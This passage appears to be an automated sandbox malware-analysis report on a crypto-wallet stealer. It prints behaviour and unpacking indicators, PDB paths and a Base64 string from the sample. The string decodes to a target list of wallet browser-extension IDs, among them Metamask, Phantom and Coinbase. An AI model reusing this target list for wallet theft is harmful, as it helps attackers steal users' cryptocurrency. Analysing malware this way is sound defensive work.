bG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 12.2.ngentask.exe.400000.0.unpack, BrEx.cs Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: C:\Users\user\AppData\Roaming\beirutt Command line argument: neyijabizux 7_2_00403A3E
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wkernel32.pdb source: fontview.exe, 0000000D.00000003.515386318.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.514698930.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINMMBASE.pdbUGP source: fontview.exe, 0000000D.00000003.562076898.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: fontview.exe, 0000000D.00000003.526678012.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.526108390.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: fontview.exe, 0000000D.00000003.521974726.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522197906.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: fontview.exe, 0000000D.00000003.523535376.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522585923.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: fontview.exe, 0000000D.00000002.574375673.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.511481087.0000000004C44000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.510890139.0000000004C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdbGCTL source: fontview.exe, 0000000D.00000003.529166790.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdbUGP source: fontview.exe, 0000000D.00000003.524433598.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _C:\fepovilorefego5.pdb source: explorer.exe, 00000003.00000003.445965683.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, C676.exe, 00000006.00000000.445306622.0000000000401000.00000020.00000001.01000000.00000006.sdmp, C676.exe.3.dr
Source: Binary string: setupapi.pdbUGP source: fontview.exe, 0000000D.00000003.564997815.0000000005178000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.567165020.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wgdi32.pdb source: fontview.exe, 0000000D.00000003.524543402.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: fltLib.pdb source: fontview.exe, 0000000D.00000003.557086498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: advapi32.pdb source: fontview.exe, 0000000D.00000003.521207061.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb source: fontview.exe, 0000000D.00000003.524283148.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: winmm.pdbUGP source: fontview.exe, 0000000D.00000003.561765846.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdbUGP source: fontview.exe, 0000000D.00000003.546083701.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\nujiwucosunes\vezik.pdb source: explorer.exe, 00000003.00000003.463370159.0000000006570000.00000004.00000001.00020000.00000000.sdmp, 43D0.exe, 00000008.00000002.477465572.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 00000008.00000000.462284028.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 0000000A.00000000.475726435.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: shell32.pdb source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdbUGP source: fontview.exe, 0000000D.00000003.523535376.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522585923.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Timayiko\Kodale\hiwer\Fami\Somayofa wiho.pdb source: C4AA.exe, 00000009.00000000.469180879.00000000009BC000.00000002.00000001.01000000.00000009.sdmp, C4AA.exe, 00000009.00000002.573291842.00000000009BC000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: msvcp_win.pdb source: fontview.exe, 0000000D.00000003.525933343.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000002.581848569.0000000004F70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: psapi.pdbUGP source: fontview.exe, 0000000D.00000003.564929757.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wgdi32.pdbUGP source: fontview.exe, 0000000D.00000003.524543402.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: fontview.exe, 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wimm32.pdb source: fontview.exe, 0000000D.00000003.557166889.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mpr.pdb source: fontview.exe, 0000000D.00000003.569388235.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdbGCTL source: fontview.exe, 0000000D.00000003.524283148.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdb source: fontview.exe, 0000000D.00000003.529166790.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdbUGP source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: setupapi.pdb source: fontview.exe, 0000000D.00000003.564997815.0000000005178000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.567165020.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 3C:\nujiwucosunes\vezik.pdb` source: explorer.exe, 00000003.00000003.463370159.0000000006570000.00000004.00000001.00020000.00000000.sdmp, 43D0.exe, 00000008.00000002.477465572.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 00000008.00000000.462284028.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 0000000A.00000000.475726435.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: combase.pdbUGP source: fontview.exe, 0000000D.00000003.531161871.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.529637383.0000000005173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: fontview.exe, 0000000D.00000003.526678012.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.526108390.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: fontview.exe, 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdbUGP source: fontview.exe, 0000000D.00000003.524332169.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wuser32.pdbUGP source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shell32.pdbUGP source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fltLib.pdbGCTL source: fontview.exe, 0000000D.00000003.557086498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wimm32.pdbUGP source: fontview.exe, 0000000D.00000003.557166889.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WINMMBASE.pdb source: fontview.exe, 0000000D.00000003.562076898.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: comdlg32.pdb source: fontview.exe, 0000000D.00000003.533865783.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.533344603.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdbUGP source: fontview.exe, 0000000D.00000003.525163286.0000000004FEC000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.524730073.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: profapi.pdb source: fontview.exe, 0000000D.00000003.551602215.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2_32.pdb source: fontview.exe, 0000000D.00000003.564725237.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: comdlg32.pdbUGP source: fontview.exe, 0000000D.00000003.533865783.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.533344603.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdb source: fontview.exe, 0000000D.00000003.525163286.0000000004FEC000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.524730073.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdbUGP source: fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mpr.pdbUGP source: fontview.exe, 0000000D.00000003.569388235.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: fontview.exe, 0000000D.00000003.522483287.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: fontview.exe, 0000000D.00000002.574375673.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.511481087.0000000004C44000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.510890139.0000000004C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\fepovilorefego5.pdb source: explorer.exe, 00000003.00000003.445965683.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, C676.exe, 00000006.00000000.445306622.0000000000401000.00000020.00000001.01000000.00000006.sdmp, C676.exe.3.dr
Source: Binary string: ole32.pdbUGP source: fontview.exe, 0000000D.00000003.559665938.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.557527438.0000000004C40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\xayagejutuximo.pdb source: file.exe, beirutt.3.dr
Source: Binary string: winmm.pdb source: fontview.exe, 0000000D.00000003.561765846.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: powrprof.pdbUGP source: fontview.exe, 0000000D.00000003.556519697.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: powrprof.pdb source: fontview.exe, 0000000D.00000003.556519697.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wmswsock.pdb source: fontview.exe, 0000000D.00000002.573666518.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.569483421.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ole32.pdb source: fontview.exe, 0000000D.00000003.559665938.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.557527438.0000000004C40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Kernel.Appcore.pdbUGP source: fontview.exe, 0000000D.00000003.550884226.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sechost.pdbUGP source: fontview.exe, 0000000D.00000003.522483287.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbGCTL source: fontview.exe, 0000000D.00000003.515386318.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.514698930.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32.pdbUGP source: fontview.exe, 0000000D.00000003.552104294.0000000005172000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.554344562.0000000005380000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Kernel.Appcore.pdb source: fontview.exe, 0000000D.00000003.550884226.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: psapi.pdb source: fontview.exe, 0000000D.00000003.564929757.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdbUGP source: fontview.exe, 0000000D.00000003.525933343.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000002.581848569.0000000004F70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdbUGP source: fontview.exe, 0000000D.00000003.521207061.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdb source: fontview.exe, 0000000D.00000003.524332169.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdbUGP source: fontview.exe, 0000000D.00000003.563958937.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.562324690.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdb source: fontview.exe, 0000000D.00000003.524433598.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdb source: fontview.exe, 0000000D.00000003.546083701.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: fontview.exe, 0000000D.00000003.531161871.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.529637383.0000000005173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: profapi.pdbUGP source: fontview.exe, 0000000D.00000003.551602215.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wmswsock.pdbUGP source: fontview.exe, 0000000D.00000002.573666518.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.569483421.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdb source: fontview.exe, 0000000D.00000003.563958937.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.562324690.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TC:\xayagejutuximo.pdb$~B|.@ source: file.exe, beirutt.3.dr
Source: Binary string: wuser32.pdb source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32.pdb source: fontview.exe, 0000000D.00000003.552104294.0000000005172000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.554344562.0000000005380000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2_32.pdbUGP source: fontview.exe, 0000000D.00000003.564725237.0000000004C40000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\C676.exe Unpacked PE file: 6.2.C676.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Unpacked PE file: 10.2.43D0.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.juv:R;.rur:R;.cenepem:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\C676.exe Unpacked PE file: 6.2.C676.exe.400000.0.unpack .text:ER;.data:W;.huxuho:R;.gini:R;.vab:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Unpacked PE file: 10.2.43D0.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E378 push eax; ret 0_2_0040E396
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B6DDC push 6700D42Eh; retf 0_2_007B6DE6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B5F84 push 623D8A45h; retf 0_2_007B5F89
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004363BD push esi; ret 6_2_004363C6
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004139F8 push ecx; ret 6_2_00413A0B
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_006AC6A8 pushad ; ret 6_2_006AC6AA
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_004051E9 push ecx; ret 7_2_004051FC
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040E378 push eax; ret 7_2_0040E396
Contains functionality to dynamically determine API calls
